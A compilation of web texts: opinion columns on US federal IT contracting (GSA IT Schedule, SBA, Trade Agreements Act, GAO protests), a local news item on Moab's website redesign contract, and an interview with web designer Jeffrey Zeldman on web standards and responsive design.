Cloud computing allows for incredible innovation and flexible solutions. It has become the major driving force in Federal IT for many reasons, among them a current Office of Management and Budget mandate for each Federal agency to identify at least three IT functions for movement to a cloud format this year.

Unfortunately, Federal regulations don't always keep pace with innovation. This fact is usually cited in cases where a Federal rule prohibits use of some new method of doing business. It can be frustrating for Feds and contractors alike to have government-unique stumbling blocks that lead to extra costs and delays. Outdated rules can also work the other way when agencies try to rely upon them to ensure common sense.

The General Services Administration (GSA) recently tried to limit the geographic locations of where cloud servers could be located. To many, it seemed like the agency set sensible limits to ensure that cloud servers weren't going to be located in war zones, countries known to have strong terrorist organizations, or other unstable places. We know by now that GSA's attempt to limit cloud server locations, however, ran afoul of a protest. The Government Accountability Office ruled that the agency could not limit cloud server locations, pointing out that the Trade Agreements Act (TAA) states that, when buying services, it is the location of the company offering the service that matters, not where the service itself may be performed.

As a result of this ruling, agencies that want to restrict cloud server locations to more stable places will have to rely on other laws or rationalizations. This will require creativity and, of course, delay in the implementation of what most agree would be a money-saving, state-of-the-market solution. It's time to see if we have the rules we need to enable us to make common sense decisions and, if not, we need to start on that process today.

One law that definitely needs updating is the TAA itself. Remember Jimmy Carter, double digit inflation, and The Knack's "My Sharona"? The year was 1979, and among the many laws adopted that year was the TAA. GM was the largest company in the U.S. in what was still a product-based economy.

No one had a clue that the "Information Age" would soon dawn or that the world would shift to a service-based economy in less than 20 years. The TAA gave short shrift to services, and keenly focused on the location of product manufacturing. The U.S. economy and world trade itself have changed fundamentally since 1979, but the TAA has not. This has forced Federal contractors, and the government itself, to come up with serpentine reasoning to accommodate the Feds' acquisition of commercial IT. The problems are well-documented and we need not review them here. Now, agencies and contractors may find that they have to create an entirely new set of serpentine interpretations just to make common sense service acquisitions.

Wouldn't it be simpler to just update the rules and regulations? Maybe we could do it faster if they were in the cloud?

SBA Needs to Provide "Care After the Contract" to Ensure Small Business Success
The Small Business Administration (SBA) routinely points out the shortcomings of Federal agencies when they fail to follow statutes or regulations governing the use of small businesses in procurement. They also aren't shy about holding the feet of large businesses to the small business use fire. All of that is fair, and a part of their mission. But, before the agency gets too far ahead of itself, a little introspection on how it's supporting small business Federal contractors might reveal problems closer to home that need attention.

The SBA has a very difficult mission. It is a relatively small agency tasked with fulfilling many different roles. Most people outside of contracting look at the SBA mainly as a place to obtain loans or other financing. The SBA is often mentioned, right after agencies like FEMA, as being critical to the restoration of local economies when disaster strikes. Their missions are often politically charged and at times, it may feel to the agency that they have 535 administrators.

Sticking to the basics, though not politically glamorous, is nevertheless essential if real small firms are to be helped. It's great to get small businesses 8(a) certified, but it is equally important to support such firms when they run into problems with other Federal agencies. Support for small business success doesn't end with the award of a certification or contract. The SBA needs to be a true "lifecycle partner" with agencies when post-award problems develop. If an 8(a) contractor has a valid claim against another Federal agency, the SBA must use its statutory authority, along with its considerable powers of persuasion, to assist that firm. The goal, after all, of the 8(a) program is to create successful businesses. While this doesn't mean that all 8(a)s are entitled to become successful Federal contractors, it does mean that the SBA achieves better outcomes by ensuring that 8(a) companies thrive in whatever market they do business. Helping existing businesses is a bit like working with current customers: it is generally easier to keep existing relationships successful than to constantly start new ones from scratch.

The House Small Business Committee recently held a number of hearings on the state of small businesses in government contracting. These hearings included the status of mentor-protégé contracts, the challenges facing the Office of Small and Disadvantaged Business Utilization (OSDBU) installations, and similar topics. More hearings are on the calendar. The topics covered and the level of interest shown should be indications to SBA officials that Congress is expecting the agency to ensure "care after the contract" for small firms.

Congress and the SBA may want to consider re-naming the existing OSDBU to the Office of Small and Disadvantaged Business Success. While this may seem to be a small change, it underscores the real mission the SBA should be focused on. What better place to start than inside its own doors?
Will GSA Survive Its Own Sustainability Initiative?
Tags: Desktops, Laptops, Printers, Green IT, Services
GSA Administrator Martha Johnson announced July 20th that her agency's IT Multiple Award Schedule will offer only products that comply with either ENERGY STAR or the government's own Electronic Product Environmental Assessment Tool (EPEAT). It will be interesting to watch whether the greater impact of this move falls upon GSA or its contractors.

Johnson's announcement came as no surprise to anyone who has heard her speak over the past two years. Dozens of companies, in fact, have already moved toward offering ENERGY STAR-only IT products or similar "green" solutions. While GSA will have to use some common sense in circumstances where there is no identifiable "green" benchmark, I am not sure that Johnson's announcement will cause a tidal wave of anxiety from contractors.

The impact on GSA, however, may be more substantial. The IT Schedule is not currently operating at peak efficiency. It is lethargic and its total sales have stagnated for the past several years. While annual sales are on track to reach almost $17 billion this fiscal year, the IT Schedule has been losing market share to contracts like NASA SEWP, specific agency MACs, and even GSA's own Alliant contract. The IT Schedule team does not move at the speed of customer need these days. Adding a new stumbling block to a contract method already hobbled may not be the best prescription for IT Schedule health.

Why does this matter to GSA? The Industrial Funding Fee generated by IT Schedule sales pays not just for that program, but subsidizes a substantial part of the agency's staff offices, such as the chief acquisition officer, chief information officer, general counsel, and others. Adding a new requirement to your IT program in a market filled with options that are already more nimble may impact operations throughout your agency.

The Federal IT market is full of contracting options. There are hundreds, if not thousands, of IT acquisition vehicles. These are vehicles that offer solutions to customers across the full spectrum of potential needs. If some government buyer has a legitimate need for IT equipment that isn't ENERGY STAR compliant, they will still get what they want, but it won't be from the GSA Schedule. I have never been a big fan of limiting customer choice via contracting. Presuming that you know what is best for your customer and will offer only those solutions is an approach that has a long track record of failure in the government market. Customers vote with their purchase cards and buy as they see fit, not from an agency that makes them eat their vegetables.

None of this even begins to touch on Johnson's similar announcement that contractors will be required to step up their "take back" capabilities as well. That is an added cost to contractors that will make the IT Schedule even less attractive. So, contractors and Federal buyers will continue to do business in the Federal IT market. Will GSA, however, become simply so over-burdened with unique requirements and costs that it offers the best sustainable program that no one will buy? Stay tuned.
Protesting the Extension of Protest Authority? Better have a Good Argument
Tags: Collaboration, Project Management, Workforce
There is surprise and uncertainty going through the Federal contracting community currently on the Government Accountability Office's (GAO) decision to continue hearing task and delivery order protests on transactions over $10 million. Many hoped that Congress' inability to pass legislation extending the authority originally granted in the Defense Authorization Act of 2008 would result in a year-end buying season with reduced protest risk. The statutory authority to hear such protests provided in the Act expired May 27th.

Not so fast, said GAO on June 14th. The agency apparently found for itself a continued ability to hear such protests, most likely based on precedent, statutory, and regulatory bases. Defense Information Systems Agency challenged the authority of GAO to hear a protest brought by the Technatomy Corporation, claiming that the ability to do so had sun-setted. While GAO said, "We conclude that we have jurisdiction to hear the protest, and deny the request for dismissal," they also said they would withhold their specific reasoning until a separate decision, apparently on this protest, is rendered.

Many contractors have long fought against giving GAO the right to hear task and delivery order protests. The original recommendation to do so came from the Services Acquisition Reform Act (SARA) Panel that, despite a litany of objections from industry, included the recommendation in its final report. Later, when legislation was being considered in Congress, a number of industry groups and individuals pushed hard against it. The basic arguments were that protests are expensive, time-consuming, and that the costs are ultimately passed along to the government. Neither the SARA Panel, nor Congress, was swayed by the arguments. In fact, I have had more than one former SARA panelist tell me that the basic message from industry was heard as "protests take contracts away from my company and give them to someone else." All of the opposing arguments came across as why the creation of the new protest authority was bad for industry, and not why it would harm the government. Such perceptions do not form a good foundation for a case against protests. This is especially true when the provision being discussed covered only non-General Services Administration (GSA) Schedule task and delivery orders. Those orders were, and are, subject to protests under separate rulings made by GAO in various cases. It is doubly difficult to argue that one type of indefinite delivery/indefinite quantity (IDIQ) contract should not have protest capabilities when another one does.

Nevertheless, contractors still plan to push Congress to specifically rescind task and delivery order protest authority. That's fine, and it's what our democratic process is all about. To be successful, however, they will need better ammunition than what's been used so far. Here are a few recommendations to consider:

· Frame all arguments in terms of what's best for the government. Few in Congress are out to do favors for contractors these days.
· Show how the government will be protected by not having an oversight tool it has today.
· Discuss how eliminating protest rights will promote transparency.
· Explain why having protest rights for Schedule purchases is OK, but not for other IDIQs.

These are just some of the arguments that those seeking to end task and delivery order protest authority will have to face and for which they will have to have good answers.
Congressional officials may have their own ideas, and there are other issues before Congress that contractors may want to consider as higher priorities.

Whatever the outcome, it is clear that protesting protests is not an easy task.

Take Care of Your Regular Joes if You Want to Build Your Business
Tags: Collaboration, e-Procurement, Project Management, Services, Workforce
Joe is a regular at the Federal IT Bar and Grill. He comes in after work each day for a glass of milk and good discussion. Like most regulars, Joe understands he occasionally has to wait for his order if it's a busy night. He's loyal to the Federal IT Bar and Grill and, after all, it's right across the street from his office. So long as there's a basic understanding that Joe will get his milk and discussion when he needs it, he's okay with sometimes not being the first person served.

And so it is with loyal customers in our regular Federal IT world. They're loyal to their contracting program, even if it doesn't "wow" them every minute of the day. In this case, let's say the program is the GSA IT Schedule. A venerable, popular contract that consistently generates more IT business than all government Governmentwide Acquisition Contracts (GWACs) combined. That certainly shows some level of loyalty and popularity.

What happens, though, when the Federal IT Bar and Grill loses its experienced servers? It now has a lot of people in the back, watching over every server's move. Only a few people know Joe, let alone that he's been coming to the place for years. Suddenly, not only is Joe not getting his milk on time, it may be last week's milk! On top of that, the good conversation that made him feel at home has been cut down and replaced by Neil Sedaka records (apologies to Neil Sedaka fans). Now, Joe does not feel he recognizes the place, and he certainly does not feel appreciated. Next week, Joe plans on trying out the new GWAC Cyber Café down on McClure Street.

This is, in essence, what's happening with the GSA IT Schedule. After a few years of musical chairs in top positions and persistent problems keeping contracts updated with the latest offerings, IT Schedule managers have gotten caught up in a series of internal hurdles and processes, all of which have made the IT Schedule more difficult to manage and taken them away from a focus on customer service. Federal IT customers are voting with their pocketbooks and taking their business to other contract methods. Schedule sales have stayed relatively flat for several years, while sales through individual agency Multi-Agency Contracts (MACs) have increased.

Like the management of the Federal IT Bar and Grill, GSA's IT Schedule team needs to focus on what's important. Job number one: Make sure your contracts have the very latest solutions at fair prices. Too often today, the IT Schedule is among the last vehicles to have new offerings. If your competitors have it first, your customers will go there. Job number two: Tell your story. GSA has a good one to tell. Fairly negotiated prices, offerings that meet all Federal rules, and do-it-yourself help when you need it, all for only .75% (yes, it's still important that customers know it's not 15%). Thankfully, the IT Schedule has a new business manager. She should hammer home this story as often as it takes. She should also have the support of senior leaders who understand that they run the IT business, and run one in a very competitive market.

The IT Schedule can win back Joe, but it will have to focus on him and meet his needs. Having too many hurdles and internal traps may result in the cleanest bar and grill in town, but does not guarantee you any business.

Look Beyond Today to Find Success Over Time
Tags: Collaboration, Networking, Project Management, Workforce
It is difficult, and scary, these days to look up from what is right in front of us at the larger environment. Recent headlines have screamed, "Government Shutdown Looms," "Contractors Expect Slow Quarter," and "Administration Lauds Reduced Contract Spending." It takes courage to keep your head up in this environment. Many companies do not. Heads are down and focused only on the immediate.

And yet, we know that to be consistently successful, your company has to keep its head up. You have to have someone, preferably a team of them, looking constantly at what's happening from side to side and over the horizon. Without that function your company can get caught flat-footed and become the corporate punch line of the old joke, "I was wondering why the ball was coming toward me so fast, and then it hit me." Simply put, there is no benefit to receiving a corporate black eye because everyone in your business is looking only at the straight-ahead near-term.

Now, such people certainly do have a place in your business. There is no way your firm can successfully close opportunities or keep its cash flow positive without professionals who have a laser focus on capturing near-term opportunities. I have run two small businesses. I get the need to ramp up business quickly and get money in the door. This is not, however, the problem I see with most companies today. It's the ability to look out beyond the current quarter or fiscal year to strategically plan. Fewer and fewer companies will make investments that do not promise immediate results. While these companies may turn a profit today, their long-term prospects are far less certain.

What happens to these companies down the road? I would argue that the pipeline dries up pretty quickly and new business becomes increasingly difficult to get. For example, the Federal market trend in commercial IT and services is toward indefinite delivery/indefinite quantity contracts. If your firm was not looking at important opportunities at the time these contracts were formed, you may find yourselves shut out of business you thought would be yours.

Also, the services or products you offer may no longer be relevant to what's happening to your future government customer. Only someone with their head up and looking around can see new developments in services and changes to government organizations that give your firm the time and ability to keep pace. You do not want to sell WordStar in a world where word-processing is now bought in the cloud.

Long-term market intelligence and a broader participation in Federal market events and/or organizations cost money. It's also current money that cannot always show a pay-off by the end of the quarter. I get it. No one has infinite resources to spread around. Not dedicating any resources to the future, however, may put the future of your company in doubt. Smart, wise investments in the future are expenses that no serious government contractor should go without. Don't be the company that gets smacked in the head with a ball from the outfield and is knocked out.

Focusing on Sustainability, GSA Risks Sustaining Its Future
Tags: Collaboration, e-Procurement, Green IT, Networking, Portfolio Management, Project Management, Services, Workforce
I think sustainability is a wonderful thing. Being responsible stewards of the resources we've been given is very important. In fact, it is my experience that industry and government have so far been working pretty closely together to "green" all parts of the acquisition process, something that I had earlier thought would be a bone of major contention. So far, so good. We now have everyone cheering "go green." No one should think that I am in favor of oil spills, Three Mile Island, or Love Canal disasters.

I am, however, in favor of the "S" in "GSA" still standing for "services" and not "sustainability." GSA has a mission to fulfill. It is to serve the acquisition needs of its government customers. GSA is, at its very core, a service business. If it's not providing the solutions its customers need, it's not fulfilling its mission or generating the income it needs to continue operations.

Right now it seems that GSA is only about sustainability. Other important operations are taking a back seat — if they can even make it into the hybrid car. Staying on this course, dare I say it, is "unsustainable." Here's why:

GSA is losing its edge in being a leading provider of IT and service solutions: Focusing only on sustainability means that GSA's biggest contract vehicles are losing their competitiveness. The growth in the Federal IDIQ sector is almost entirely in other government agencies. The proliferation of single agency Multiple Award Contracts (MACs) is taking away business and opportunity from GSA's contract vehicles. Exhibit one is the IT schedule where sales have been flat for several years. One-time GSA customers are voting with their wallets and using their own MACs. While GSA's Alliant contract is getting decent business, how much better could it be, though, if it had top-level attention and promotion? One item for GSA leadership to examine: how to test cost-type contracting on vehicles like GSA schedule contracts. If your biggest program doesn't offer it, and your biggest client, DOD, wants it, you'd better find out a way to get it to them if you want to keep their business.

GSA can't add innovative solutions to its contracts fast enough: Another issue that needs top-level attention at GSA is the process by which new products and services are added to existing contracts. It used to be that if a new item was introduced in the commercial market one day, it could be added to schedule that same day. Anecdotal evidence now indicates that at least some COs are asking for a full year of commercial sales before they will consider allowing an item onto a schedule contract. By then it's no longer new — and it can most likely be found on a half dozen other government contracts.

GSA is more than the Public Buildings Service (PBS): Scan the GSA Web site and you will find that the overwhelming majority of discussions have to do with the Public Buildings Service. Indeed, PBS is an important part of what GSA does. Still, PBS is only part of the agency. If it's getting most of the press and the attention, it doesn't take long for the other parts to atrophy. GSA's senior leaders need to show the Federal Acquisition Service the necessary attention and dedicate resources to it at the top level to make sure there is no atrophy.

All of this adds up to a GSA that is headed toward trouble if the single sustainability track remains in place. If your offerings are no longer relevant to your customer, there is no reason for them to come to you, no matter how sustainable they may be.
The agency will no longer be able to support itself through solution-generated revenues. Congressional appropriations are highly unlikely.

It is time to place the sustainability initiative in its proper perspective: an important, but not all-consuming, goal for GSA. Let's hope that the agency can address its other needs and remain not just sustainable, but essential, for years to come.

Industry-Gov Communication Forecast? Depends What End of Penn Ave You're Taking the Temp From
Tags: Services, Workforce
It is a simple fact that communication is the key to successful relationships of any kind. This includes the business of government contracting. It is also a fact that people in authority can exercise great power with their communication. With this power, though, must come responsibility and an awareness of how big of an impact their communication can have.

These two facts intersected twice in early February in the field of government contracting. One example could have a tremendously positive impact on the business of government. The other could all but cancel the first one out.

In issuing a memo to all government contracting offices promoting government-industry communication, Office of Federal Procurement Policy Administrator Dan Gordon used his position to target head-on an old problem that has recently reared its head again: a view that government contractors are the enemy and that communication with them should be limited. By promoting better and more frequent discussions, Gordon understands that it is vital to the successful conduct of government business for contracting officers to interact with industry. Only through open, proper discussions can an overburdened workforce properly position their procurements in order to drive the best government outcomes. Mistakes are identified earlier, requirements are more accurately defined, and a true understanding of what the "state of the market" is for a particular need is obtained.

At the same time Gordon was issuing his memo, however, Senator Claire McCaskill (D-MO) chose to use her substantial procurement oversight bully pulpit to undermine confidence in the acquisition workforce and encourage minimal communication between that workforce and the contractors they must work with in order to meet the many missions of government. Specifically, McCaskill chose a hearing on government audit practices to issue a statement that many government contracting officers have gotten "too close" to contractors to make good judgments. The former state auditor apparently believes that contractors can hold a Svengali-like sway over government buyers if they communicate too much. Perhaps unsurprisingly, the Senator advocated for auditors to have the last real say in what constitutes a good contract price because they are detached from day-to-day contractor interactions.

Wow. In one hearing Senator McCaskill managed to both actively discourage the sort of discussions that Administrator Gordon advocated for in the same week and insult the integrity of what is largely a professional, responsible acquisition workforce. Where Gordon sought to thaw government-industry suspicion, McCaskill took it right back to the freezer.

While the Senator is certainly entitled to her point of view, she perhaps could benefit from a bit of restraint and more carefully chosen words. She is no longer a Senate back-bencher, but the chair of two key Senate subcommittees with some form of government contracting oversight. Her words and positions carry considerably more weight and can have a profoundly chilling impact on what should be routine government-industry communication. With the pulpit that she has obtained comes the responsibility to communicate wisely from it. It is probable that the Senator wanted to send one message; it is equally likely, however, that the workforce heard another.
Without more careful use of her position she could easily find herself holding oversight hearings next year on why the government cannot conduct well-defined or timely procurements.

Communication is a powerful thing. Communicators should use that power wisely and well.
Moab city approves contract for website redesign
Jan 24, 2013

The website for the city of Moab will be redesigned and upgraded this year.

The Moab City Council voted Tuesday, Jan. 22, to approve a three-year contract with CivicPlus, a company that specializes in designing websites for government entities. CivicPlus, a Kansas-based company, was chosen by a committee made up of city staff members. The company was chosen based on the fact that it was "the most responsive, offered the most experience and [was] reasonably priced," according to a memo given to the city council by the committee.

Under the terms of the contract, CivicPlus will redesign the website to improve functionality and online navigation. CivicPlus will also provide all necessary training for city staff who will serve as system administrators. According to CivicPlus's website, the company has been specializing in "city and county e-government communication system[s]" since 2001.

The three-year contract will cost the city $10,627 per year. That price initially seemed high to some council members, according to Tuesday's discussion. "I was taken aback by sticker shock," council member Gregg Stucki said. "But seeing the other bids, I realized that it's not out of line."

The city had the option of a slightly cheaper contract which would have required a payment of $23,998 up front. However, Rachel Stenta, assistant city manager, explained that paying the yearly fee would allow the city the option of having another website redesign done at the end of the three-year period. "The option we would be going with is the three payments," Stucki said. "There are some advantages to that, even though it works out to being a little bit more." (Three annual payments of $10,627 total $31,881, or $7,883 more than the up-front price.)

Council member Kirstin Peterson said the website changes will be useful for city residents and employees. "I sat in on the meeting with this company," Peterson said. "It's very comprehensive. I think it will be taking the city website a huge step forward to really serving our community, and being a great tool for all the departments to work with."

Stenta said that the next step will be to develop a project schedule for the redesign, but city officials are hoping to have it done by the end of the fiscal year. "Hopefully we can launch in July," she said.
Interview with "A List Apart" Founder Jeffrey Zeldman
By awwwards-team
Jeffrey Zeldman is a key supporter of Web Standards
Jeffrey Zeldman is certainly one of the world's most renowned personalities on the Web. A guru of Web standards, Zeldman is also an entrepreneur, web designer, author, podcaster and acclaimed speaker.
He has been publishing independent web content since 1995. He was one of the first pioneers of Web Standards, and is creator and editor-in-chief of A List Apart and founder of web design studio Happy Cog.
We were with him at the Future of Web Apps event that took place in London in October. www.zeldman.com | Twitter: @zeldman
We chatted to Jeffrey in London
Awwwards Team: You’ve been involved in a lot of projects since 1995. The Web Standards Project, Happy Cog, A List Apart...How do you find the time?
Well, the Web Standards Project I’m not involved with anymore. It’s a pretty quiet thing now. Some friends and I started it in the ’90s, Steve Champeon, Jeff Veen, Dori Smith, Tim Bray...
When we started nobody cared about web standards. We made up the word, because there were no web standards; there were just some W3C recommendations that nobody paid attention to, and there were four versions of scripting languages. One was JavaScript. And so all that stuff has been taken care of. There's a new group called Future Friendly that's sort of picking up the ball and saying "Okay, now for the next generation of devices, how do we approach this again?"
There could be a new Web Standards Project tomorrow, say for TVs, I think. Phones tend to have WebKit or Opera browsers, or Chrome browsers, and it's good, so though I'm simplifying, that's not too much of a problem. But TVs have browsers now and people are going to want to navigate using a TV remote, and a TV browser isn't necessarily a fully-fledged WebKit or Mozilla or Opera or IE browser, so you really don't know what you're getting. I think there's always work to be done.
Then there’s A List Apart. We’re in the middle of a redesign, it’s launching at the beginning of the new year. It will continue in the vein that we started, but it will have more features. I started the magazine in 1998 and every 2 weeks a new issue would come out and usually there were 2 articles in the issue and that was the whole thing. It was always a magazine. I thought of it like a magazine, I ran it like a magazine and so it’s not a blog and it’s not constantly putting out content.
Our focus will continue to be very well-vetted, carefully-edited, carefully-researched articles that try to advance the craft of web design, focusing on content strategy or responsive design or some other aspect of the craft. But we’re going to have columns- we have some really brilliant people lined up as columnists- and we’re going to have a blog. We’re launching with those two additional content features just to get people used to the idea that there’s more frequent content. We don’t want to introduce everything new at once because we would lose our focus and also it would take a huge staff and we don’t have that. We’re going to roll out new features a bit at a time and see how our community responds, but we have a lot of other secret, wonderful features coming.
The design is already beautiful and the new design is really beautiful, impactful and very magazine-like. Jason Santa Maria did the last design and it had sort of a literary quality. He was trying to evoke the feeling that this was a library for web designers and he did it very skilfully, and now Mike Pick and Tim Murtaugh are redesigning and it's going back to the magazine idea, a modern magazine like Esquire (which is actually an old magazine but always has modern art direction). I think it'll be very interesting to see how the community responds.
We have an editorial staff and we're constantly reviewing submissions. There's a lot of stuff we send to other publications because it's good, but it's not quite right for us, or sometimes things feel like a rehash, like they're not really new. We have a very high bar. That's why we don't publish all the time, because we're really trying to advance the craft of web design and digital experience design generally and that means that we have to say no to a lot of content that gets submitted to us. There's a good place for that content but we're just not it.
Even though we have a wonderful acquisitions editor, a wonderful editor-in-chief, and a whole team of technical editors, I still write the blurbs when the issue is about to go live. I've always done that and it wouldn't somehow feel like A List Apart if I stopped. If I ever stop doing that I'm sure it'll be great, and I'm sure other writers would pick up where I left off, but there's just something about doing it that feels right to me.
Happy Cog. Our editorial headquarters are in New York which is where I am, and we have client services headquarters in Austin and Philadelphia. They do wonderful work so I'm able to delegate a lot of that work. I don't have to be hands on and I can focus on the editorial side. I meet the clients and I know what's going on and it's wonderful, but I don't have to supervise the projects. I stopped doing client projects only about a year ago.
A Book Apart
Do you mind not doing them?
It's mixed. Is feels like a relief in some ways, after 20 years of doing client services. To not necessarily have to call a client on a given day is kind of a nice thing in a way. I love clients, I fall in love with our clients. I always have good relationships with them. We pick our clients carefully, so I miss it too. And then delegating is a strange thing because on the one hand, you trust the people that you've hired and they're really good, they really know their job. But at the same time you're not doing it, so there's a sense of loss and fear of "Is it still Happy Cog if I'm not doing everything?"
The self-aggrandizing fantasy I have about it is it's like Walt Disney. When he started he animated every frame, he did all the animation and all the drawing at first, and eventually he did none of it. So there's some kind of arc there, I'm somewhere on that arc. I'm definitely not Walt Disney, but that's how I'm able to feel comfortable with it. This is a natural evolution and this is what I'm supposed to be doing. I love the editorial stuff. I think I'll do more client services again, but right now it's just nice to have a break and focus on the magazine and the books and the conference. Jason Santa Maria, Mandy Brown and I founded A Book Apart, and we have new books every few months. Mandy is the editor, so I'm involved in acquisition and content but I don't actually have to do the hard, in-depth manual work of reading each draft and revising the work with the author (though we have great authors so not much revision is needed). So that's how I'm able to do all these different things. The conference has a great staff, An Event Apart, and we have 8 shows a year now.
An Event Apart
Who's in charge of looking for talent and trends and content for An Event Apart, and how do you go about it?
My partner Eric Meyer and I do that. I see what people are talking about on our stage, I see what we're doing at Happy Cog and what my friends are doing at their studios and it's kind of easy to see. You run up against a problem like "What do we do about responsive images?", you read other people's blogs to find out what they're saying about it, you find the smartest people talking about the stuff, some of them I work with, some of them I speak with at An Event Apart or at other conferences.
We're always looking for people who have made a difference in the industry. Luke Wroblewski with mobile, Ethan Marcotte with responsive, Karen McGrane with adaptive content and Kristina Halvorson with content strategy. These are people who've made a huge difference and are great speakers. That's really important because some people are gifted writers, but on stage they freeze up, they're not natural, they're not funny. We're constantly looking for new people to bring along because we don't eventually want to be a bunch of 70-year-olds: "You saw them for the last 10 years, come see them again!". We're not just going to keep bringing the same stuff out every year.
We structure the days like playlists and we'll start with someone really strong on a particular topic and then we'll make sure the next speaker has a related topic but a slightly different angle on it. Maybe the middle speaker is less experienced, so we'll sandwich them between two really strong speakers. They may turn out to be the hit of the show. I really think of it like music, like making an ideal playlist. It's not just how great is that song, but how great is that song after this other song? We try to make sure there's an educational narrative running through the two-day conference and we really try to take a holistic approach. Are you going to get a pretty strong overview of the most important issues that we're all wrestling with right now? What do I do about mobile? What do I do about content? How do I not design the whole website and then beg for the content the day it's due? How do I deal with all these new devices? How do I avoid all these traps and problems?
I used to make a joke that there are 500 standard breakpoints in Android. Android is like Windows in a way, like Windows used to be. Apple was always "We make an operating system for our own computers, and here are the three models of our computer this year, and buy one of those because that's what you've got to choose from". Windows was always, "Hey, we don't care if you've got a really new computer or an old one", and by being compatible with all those different devices they offered a different experience. Windows meant you could basically have $5 and still have a PC, and that was wonderfully democratic but because they didn't know the capabilities of each screen and everything else, it was a complicated operating system, and buggy, and you might not have a great experience. And I think that's true with Android too. Android is along that line. The phone has all kinds of capabilities and features, depending who manufactures it.
Originally when the iPhone came out it really excited people in mobile. "Now I can really design a good thing for mobile". But they were like, “Well, now I can design for this screen.” But when Android came out they were like "Oh, there's too many screen sizes, now what will I do?". Responsive is one answer to that, and there are other answers as well, but the idea that you can just design for one screen size is gone, I think.
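(Editor's note: for readers new to the technique Zeldman is describing, here is a minimal sketch of breakpoint-based responsive CSS. The selector names and the 30em/60em breakpoint values are our own illustrative assumptions, not taken from any Zeldman or Happy Cog project.)

```css
/* One fluid layout, adjusted at a few viewport widths instead of
   targeting individual devices. Breakpoint values are illustrative. */
.page {
  width: 90%;          /* fluid by default; suits narrow screens */
  margin: 0 auto;
}
.sidebar {
  display: none;       /* hide secondary content on small viewports */
}
@media (min-width: 30em) {
  .sidebar { display: block; }   /* restore the sidebar at mid sizes */
}
@media (min-width: 60em) {
  .page { max-width: 60em; }     /* cap line length on large screens */
}
```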
Is everything you do at Happy Cog now responsive, or are there still projects that aren't?
I would have to say just about everything is. I did a fixed-width responsive design for my site, which doesn't make sense, except it does, it works. I have a hard time myself because I think we're doing some really gorgeous stuff now with responsive, but it's a challenge. If you buy into the hallucination that we have some control over the canvas, and you set up a fixed-width, it is easier to do a design that feels controlled and very elegant, very finished. Just like if you're designing for a particular screen size you could go, "I'm going to fill this part of the screen with this". We like that, we like our canvases. It's harder thinking outside the canvas. I think there's an explosion of new ideas in design, but then some responsive designs are absolutely gorgeous.
Our colleague Martha caught up with him.
When clients come to Happy Cog, to what extent do you have to evangelize to them about content-first and accessibility and web standards?
The beauty of it is, most of the clients who come to us come to us because of our reputation and they often come having read A List Apart, and maybe reading A Book Apart books. So when they come to Happy Cog, we don't generally have to sell them a content strategy, they come wanting it. We don't have to sell them on web standards, they know that we do that. That's why they're coming.
I think, this is a generalization, but people in the same field tend to hire us. In other words, someone who read “Designing with Web Standards” and worked as a designer, and is now maybe a content director at a company, brings us in. Their boss may bring in another studio that's more corporate, bigger, better-known in the corporate world, and so then we sort of compete for the job, but if we're hired the people who hire us want what we have. That's the marketing we do. A List Apart started before Happy Cog, so A List Apart is Happy Cog's marketing but we don't do the magazine for that reason. We do the magazine to try to advance the industry but then, because we happen to have a company that does stuff, people who care about the industry will go “Well, let's give these people a shot, they seem to know what they're doing.”
So you tend to get quite ideal clients in a way?
Yes, we tend to get really smart, wonderful clients. No job is ideal, and no client is ideal; we're not ideal. We're all people, so there's always something unexpected that happens. Something needs to get done faster than we agreed, or the portion of the budget we thought we had for research dries up. There's always some kind of negotiation, but we have really good Project Managers too. That makes a huge difference.
When I started Happy Cog it was originally just me freelancing, and I was putting together small teams of freelancers in the beginning and that was cool but we didn't have Project Managers. I was like "I'm a Creative Director and I'm a Project Manager". That doesn't work so well. I mean, it worked well in that we did great projects, and I had nice relationships with the clients and we fought for good work and everything, but I wasn't necessarily going to get up early in the morning and call the client and say "Here's what we're doing today". Clients really like hand-holding, and the more money they're spending the more they need that. And it makes sense. I can't imagine taking $100,000, giving it to someone and waiting three weeks to see if they had something to say to me. Now we have these brilliant Project Managers who are constantly checking in with the clients and making sure everyone's on the same page, everyone knows what's expected that day and everyone knows what we're working on, and if there's a quibble about something that it gets back to the right people, it's addressed. That makes a huge difference, it's one of the most important things. Nobody talks about it.
What made you realize you needed that?
Having done without it, and then hiring people like Dave DeRuchie to do it in Philadelphia and seeing what a difference it makes to have really brilliant people at the top of their game handling that, so that designers can design and coders can code and everyone can relax and do their jobs and not worry about someone being angry because you forgot something.
We've almost never had an unhappy client, but once I had an unhappy relationship with a client. I thought we were speaking the same language and I thought from our contract and everything else that it was clear what we were and weren't delivering, but the client somehow had in his mind that we were responsible for putting all the content on his website. We delivered these templates and style guides and content guides, and we gave him these "For instance" pages, and we had a content strategist and an editorial person on that project, more than design studios did back then. But it got to the point where he was never going to be happy, and he was never going to pay, and we were never going to finish so...not always ideal.
You learn from that, and I learned two things from that. One is I'm glad I incorporated because if I wasn't incorporated and things had gone really wrong I could have lost my apartment, been selling pencils on the street. And the other thing I learned was that I needed a really good Project Manager. I shouldn't assume my clients get it, I shouldn't assume they're so smart, they're so cool, they get it. We're very lucky that usually that's the case. I mean, we work for it too, but we tend to have clients who get what we do and want what we do and understand what we do. But every once in awhile we're not going to have that and so you just need someone who very clearly says "This is what the studio's responsible for, here's what we're doing."
Trends and Future in Web Design
What trends do you see coming in web design?
I think people are getting our content in different ways, they're finding it in different ways and they're using different devices and, for good or evil, web-capable TVs are the next thing. So I think we have to keep on thinking about mobile-first and content-first, I think we have to keep on figuring out what to do with tiny devices that have high-res screens and may have fast bandwidth but may have slow bandwidth. I think there's a lot of stuff to figure out. How do we keep using standards? How do we develop new standards? I think given the wide range of devices and use-cases, one of my favorite imponderable questions is "I have a screen that wants high-res Retina images, but I'm on 3G".
What do you send me? And how do you know if I'm on 3G? 50% of the time people are using their mobile in their home or office, where they have fast bandwidth. I don't know, I have no way of knowing what your bandwidth is, so what do I send you? Whatever I send you, I'm going to make somebody unhappy. Is there some other way to go about it? Can we just carefully choose our images, like, "I'm going to use watercolors, where even if it's medium resolution, it still looks cool"? Can we blur the background so that there's less bandwidth even if it's high-def? There's lots of stuff to think about, there's lots of new challenges. Responding to all those new challenges, at a moment when we're moving faster than reason, is the big challenge now.
And then taking better advantage of mobile. Taking better advantage of geo-location and built-in cameras and all that stuff, whether native or Web App. Taking better advantage of those things.
